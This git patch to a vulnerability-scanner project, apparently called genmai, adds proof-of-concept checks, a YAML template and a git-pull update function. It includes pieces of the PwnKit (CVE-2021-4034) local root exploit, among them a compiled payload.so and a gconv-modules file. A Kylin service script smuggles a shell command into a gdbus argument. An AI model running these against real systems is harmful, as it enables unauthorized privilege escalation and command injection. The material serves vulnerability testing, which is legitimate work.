From 6f92768056741d339356bad0ffa17d746fbf2b86 Mon Sep 17 00:00:00 2001 From: song Date: Fri, 10 Mar 2023 12:15:48 +0800 Subject: [PATCH] =?UTF-8?q?=E6=96=B0=E5=A2=9Eupdate=E6=A8=A1=E5=9D=97;?= =?UTF-8?q?=E6=B7=BB=E5=8A=A0poc=E6=A8=A1=E6=9D=BF;=E4=BF=AE=E6=94=B9?= =?UTF-8?q?=E9=83=A8=E5=88=86poc=E8=BE=93=E5=87=BA=E6=A0=BC=E5=BC=8F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../CVE-2021-4034/CVE-2021-4034.yaml | 2 +- .../CVE-2021-4034/GCONV_PATH=./exploit | 0 .../CVE-2021-4034/exploit/gconv-modules | 1 + data/SystemPocs/CVE-2021-4034/payload.so | Bin 0 -> 431 bytes .../CVE-2022-0351/CVE-2022-0351.yaml | 12 ------ .../SystemPocs/KVE-2022-0205/KVE-2022-0205.py | 6 ++- .../SystemPocs/KVE-2022-0206/KVE-2022-0206.sh | 2 + .../SystemPocs/KVE-2022-0210/KVE-2022-0210.py | 2 + data/Yaml Formwork/formwork.yaml | 34 ++++++++++++++++ docs/genmai使用文档.wps | Bin 279040 -> 283648 bytes src/genmai/ArgParser/ParameterParser.go | 3 +- src/genmai/Update.go | 38 ++++++++++++++++++ 12 files changed, 85 insertions(+), 15 deletions(-) create mode 100755 data/SystemPocs/CVE-2021-4034/GCONV_PATH=./exploit create mode 100644 data/SystemPocs/CVE-2021-4034/exploit/gconv-modules create mode 100755 data/SystemPocs/CVE-2021-4034/payload.so create mode 100644 data/Yaml Formwork/formwork.yaml create mode 100644 src/genmai/Update.go diff --git a/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml b/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml index e736f04..ef157f5 100644 --- a/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml +++ b/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml @@ -1,5 +1,5 @@ FormatVer: 20230306 -Id: CVE-2021-4043 +Id: CVE-2021-4034 Belong: system PocHazardLevel: low Source: https://github.com/berdav/CVE-2021-4034 diff --git a/data/SystemPocs/CVE-2021-4034/GCONV_PATH=./exploit b/data/SystemPocs/CVE-2021-4034/GCONV_PATH=./exploit new file mode 100755 index 0000000..e69de29 diff --git a/data/SystemPocs/CVE-2021-4034/exploit/gconv-modules b/data/SystemPocs/CVE-2021-4034/exploit/gconv-modules new file mode 100644 index 0000000..ace8b1b --- /dev/null +++ b/data/SystemPocs/CVE-2021-4034/exploit/gconv-modules @@ -0,0 +1 @@ +module UTF-8// INTERNAL ../payload 2 diff --git a/data/SystemPocs/CVE-2021-4034/payload.so b/data/SystemPocs/CVE-2021-4034/payload.so new file mode 100755 index 0000000000000000000000000000000000000000..8080e4067b61fb56977aa6669490e5d955413c65 GIT binary patch literal 431 zcmb<-^>JfjWMqH=W(GS35N{Gx$N?&`0j2;*J1|%ph}Q3b|g7;=6a|(XP`8L z07L~7RG$G<9Gy;p8U&+Z`asIrpmHDzmp+&h4k!cJjm$7fAUy$UKa2*s3m@QtO2Wd2 x70QR{hq(>L=Rz}#8;y_2^)UROl^Ma$>ajyVDKk&MID=tkKuCO0T$VLZ5CEU~6hr_3 literal 0 HcmV?d00001 diff --git a/data/SystemPocs/CVE-2022-0351/CVE-2022-0351.yaml b/data/SystemPocs/CVE-2022-0351/CVE-2022-0351.yaml index 8dc1ede..3e74c38 100644 --- a/data/SystemPocs/CVE-2022-0351/CVE-2022-0351.yaml +++ b/data/SystemPocs/CVE-2022-0351/CVE-2022-0351.yaml @@ -33,18 +33,6 @@ SiteRequests: Exec : ./CVE-2022-0351 Args : ExpireTime: #second - - # < input - # > output - # . wait - # ? condition - # : content - # - #组合起来 - # >. 等待直到输出 - # << 输入字符 - # >?判断条件 - # ??判断程序错误码 eg. "??:0" Inter: - "??:0" Condition: None diff --git a/data/SystemPocs/KVE-2022-0205/KVE-2022-0205.py b/data/SystemPocs/KVE-2022-0205/KVE-2022-0205.py index 3bda459..2a6931e 100644 --- a/data/SystemPocs/KVE-2022-0205/KVE-2022-0205.py +++ b/data/SystemPocs/KVE-2022-0205/KVE-2022-0205.py @@ -36,5 +36,9 @@ def copy_file(target_dir, src_file): os.system('touch restore_all_sound_file.txt') copy_file("/etc", os.path.realpath("./restore_all_sound_file.txt")) -os.system('ls -l /etc/restore_all_sound_file.txt') +result=os.popen('ls -l /etc/restore_all_sound_file.txt') +if result.read=="restore_all_sound_file.txt": + print("succ") +else : + print("fail",result.read()) os.system('rm restore_all_sound_file.txt') \ No newline at end of file diff --git a/data/SystemPocs/KVE-2022-0206/KVE-2022-0206.sh b/data/SystemPocs/KVE-2022-0206/KVE-2022-0206.sh index 42c9080..75a3281 100644 --- a/data/SystemPocs/KVE-2022-0206/KVE-2022-0206.sh +++ b/data/SystemPocs/KVE-2022-0206/KVE-2022-0206.sh @@ -4,4 +4,6 @@ if ls /tmp/toggleCameraDevicTest.txt then gdbus call --system --dest org.ukui.kds --object-path / --method org.ukui.kds.interface.toggleCameraDevice "1';rm /tmp/toggleCameraDevicTest.txt;'" echo 'successfully' +else +echo 'fail' fi \ No newline at end of file diff --git a/data/SystemPocs/KVE-2022-0210/KVE-2022-0210.py b/data/SystemPocs/KVE-2022-0210/KVE-2022-0210.py index 3477de4..6a94747 100644 --- a/data/SystemPocs/KVE-2022-0210/KVE-2022-0210.py +++ b/data/SystemPocs/KVE-2022-0210/KVE-2022-0210.py @@ -12,4 +12,6 @@ set_main_source("/etc", os.path.realpath('./set_main_source.txt')) result=os.popen('ls /etc/set_main_source.txt') if result.read() : print("successfully") +else: + print("fail") os.system('rm set_main_source.txt') \ No newline at end of file diff --git a/data/Yaml Formwork/formwork.yaml b/data/Yaml Formwork/formwork.yaml new file mode 100644 index 0000000..8beb9f7 --- /dev/null +++ b/data/Yaml Formwork/formwork.yaml @@ -0,0 +1,34 @@ +FormatVer: +Id: +Belong: +PocHazardLevel: +Source: +SiteInfo: + Name: + Severity: + Description: + + ScopeOfInfluence: + + References: + - + SiteClassification: + CvssMetrics: + CvssScore: + CveId: + CweId: + CnvdId: + KveId: + Tags: + - +SiteRequests: + Implement: + ImArray: + - Inter : + InterArgs : + Exec : + Args : + ExpireTime: + Inter: + - + Condition: diff --git a/docs/genmai使用文档.wps b/docs/genmai使用文档.wps index b2c284ca1fdd8dff91644c4eb33f51bd9e04ec85..ad32db45b73e15c7c333e3a80674a82885e76079 100644 GIT binary patch delta 5077 zcmc(jdr;KZ701v0?PYi6A)qVraF<;cVO<2#L5jpt9ZPZW_2ae>qgpU=mc$w&_cDIgU%z^m0i5vos^ zl@60?QS1>pf!6$Ap;zBgEb1a9qkjU#T-6f=LS!d}9PCeIQf<04^FSlfY}8+hFsr9I z9Y9*I<=YjTnyE{Y`=L=FHAe|EFN=Uas2mzbG!J_GDwJpn($AyOAa$hNpg)EV{vp(n z`i_1xQ1BMWz>>r%JN z=&M;MXXO^TT}Rem@RXh{il5~y8auV0FM=jeJ-V42)V#@c86DgzHqbejl4!A8dHC z>e8yr61C;pwC)ba`qfigT+_-cQX0BzkEi64mt57gY#}?1$B)xtYg;Pgwq0lz^;UFO z>zA42FU_S)O6nRyCVJwD^jI-lT&>$!)zB}Xy_Fur7+1oSD^S_tAKx<6wPK7bQQwVt z4Gn`po;EjHacLPsmesvd4$Ygq_-wNq_LxgNU6);#wuSpLOAK>&Rv;d>Exwqe@2;<^ z^_onz!Yg7Xg+#1*gJ`-@5cSh7$o9@m*ei5pSA_a-LZKRIi&k6XP3j`^eTp){yVty1 zC{g9= zsH-VY$Iii1THuUy&s(r#Iu%YDM8%WzG!;w(m0+oZs*yd~NRuZLJvPxwb$`H?96~;e z#e&w0C-#%e!IFv6xB^s76r_F`KN;E&Ruj#RE{3XBn_g{=GxchcJkA1VlzZOsgT2qyw_z#It()LG zR{-;WPc2aTRX5Ow1<1hj+zyU_qu?Ys1x|x=Z|?O>=Y5^!>1(fwuk%5Dbl#WDAiw76 zacp-_=xxh%7I^NdS0m@FUiWm*D}c8(>3QxH6OjZ1KnW-VJHamSGjQUtwzx2RSfW}J zlLFTtr@mrK=yR5XX5_Yw7ntQ^TkHFHBVga$y;;7K<(S(0EcZChZ?JA}+e&1_q$JYM zF*7fNeV`ru0(5}SK7Q}mk%Qim`Vyf&j`wz?ZMj1F_9Uaekk1%=zTmS3pDXxG!RHBn zWAodZ-_-2ruVQ7~d_KJyL*%?VGC5AXuNEi8spZKLjswAk&jly81SeL(F^n<9V2Rb3 zh5AXdDK`CnD?M}+hmY<(dRGcP|09-gp$Sc)uZb8##!WKlx((0yY%P&)FNXHxTO2g zP3HlN9Bhc;(=sm}ezCG6W@p=B(o#mrj8cMoz7bAj#EtrLbf6v^gSR;L3JnIaAP&TX z1fZa<|Ea(_$HN|;44_K33X0+@y*4#P&Q#|p#?E~yGE3+ua7ieaBrNvd0GHx+<;E>) zu7BMX;sQ3B#%O;_l{JRXoK5eQc=vQpamcBP?IHBR@FVc+j(3NJ+8a)J-;mc|^^ME= z=*sw}f^`)~Ut9Ocu69q=AJ2bSb#3#Ng_H}?Fn#{?Z_WRDOJLvlLlv6jZ|NDpKUu;`g^`$v~{f(K|Px$OrCw=cs zx#s`;(KYg%J%`ey;?2|N3X!df;SXr0I^h&T+iF)*#rL$=>`J<~WB8IvrLa=7+Ld@U zuX%VxJ%-XQLqB1=g=n@qVOHCkqqN<2C02|Mv^m|}@QAXhDbS|w+^uc&fi}N8*VQIF z&?fBspeA8xg1k;!o#Ja02Q}M8<$+teGy0nfeL%q+f5Xm`7nO@GO7jkXZ`zq3=!T1W zEqa4)pysF(F}XshkXkTcAU zFI%@47mGaPQR~pGb(h}q#~X|GPcJOh`j3$9TI@(Uye&h53Ss^JX`H}YdXxV^WA+`E!`FPtXDaG5`=h?DB-w(xQ_&_C}LatkK y|JsUC(&~?OZqJds46;A^({l1;a(XOcaUdQffFZyPEP$I@yF!lJJ6(BlwfHX;G#p9* delta 1641 zcmZ{ke@vT27{~A4_ujXK0$ZU#3#Cw~O~V*J7Lq|%L%Se_f`s9i%aZZKxJk@naKjh} zN)r}{i8{7Z-euY1q9K_YROqys*$@1~g=9`#;*_W$(HVb5!-m<|kFx##Yl;Avyu&?vnEQfq$_=wd6+h%^zlFhFdqcd<2yhMiYW=I*N z@P?{QaB2xnH$T&^t7s>rmORO~NtwKLyd=S=lHgMtxAP0*SxTIT$avpw-Sfk19<(&79p_W>E-G>A$>VNMfWPmtL;KQG zWWYOKZBoeeaJEhrmoJ%cUu~8f`6m%P3q2nGEo1CnLL?9gX5ldK0);^|v$E2O!z3y{ zTRSLI!a_BVR8xMTu1mL6JnZ*`{2`~mMY7+Q2@!}!@p~XY=&QKauw{MaPq%9>oqcil ziOGSE%fJ87!T)M-@tlCw`k3kPm4!`ZGw-~)bZz3s7he~DGxuFuS@e5lPh^g_2dWC3 zvypp$zV`V2Jl{)^o%gOquQuIXsaC5oy57DNkVd_%XU{9RWZ2+JN$W;0(%S=2b;#>L z?B)y*bEW~x2>A-6fdzmPM1BP#35!5vMZ7POnSOEk2?-w3=De)i*djUIf6q{_Ftts4 zvbSkZ_}FCFyOp7yd0B8Yz6#g>W4&q`>Yq15J6OjCs7t$B#}4vNiRmUpr0{60XJvdrO4p|RtWwE@$*0}%vp!m* zJy*{L6fZ32v^({zPxV9Gj+)7a5L$~v{Bsse*}x1eAP3|ED@Y7IjL=W$m{_D$wK7Ml XkOVo1FQOf3Wf|d9t*nzC>2dr61?7mB diff --git a/src/genmai/ArgParser/ParameterParser.go b/src/genmai/ArgParser/ParameterParser.go index 0fb3cd6..309c6cc 100644 --- a/src/genmai/ArgParser/ParameterParser.go +++ b/src/genmai/ArgParser/ParameterParser.go @@ -114,7 +114,8 @@ func ParameterParser(sSystem string,sKernel string,sWeb string,sBaseLine string, if Update=="true"{ if sSystem=="false"&&sKernel=="false"&&sWeb=="false"&&sBaseLine=="false" { - fmt.Println("Updating") + fmt.Println("Updating...") + genmai.Update() return }else{ fmt.Println("The update process does not allow other processes") diff --git a/src/genmai/Update.go b/src/genmai/Update.go new file mode 100644 index 0000000..43aefc4 --- /dev/null +++ b/src/genmai/Update.go @@ -0,0 +1,38 @@ +package genmai +import( + "fmt" + "bytes" + "os/exec" + "os" + "strings" +) +func Update(){ + currentDir, err:= os.Getwd() + if err != nil { + panic(err) + } else { + } + currentDir=currentDir+"/../" + os.Chdir(currentDir) + + currentDir, err = os.Getwd() + if err != nil { + panic(err) + } else { + cmd := exec.Command("git","pull") + var stdout, stderr bytes.Buffer + cmd.Stdout = &stdout // 标准输出 + cmd.Stderr = &stderr // 标准错误 + err := cmd.Run() + outStr, errStr := string(stdout.Bytes()), string(stderr.Bytes()) + if len(errStr)!=0{ + fmt.Printf(errStr) + } + outStr=strings.TrimSpace(outStr) + if err != nil { + fmt.Println("Updte Err:", err) + } + fmt.Println(outStr) + } + +} \ No newline at end of file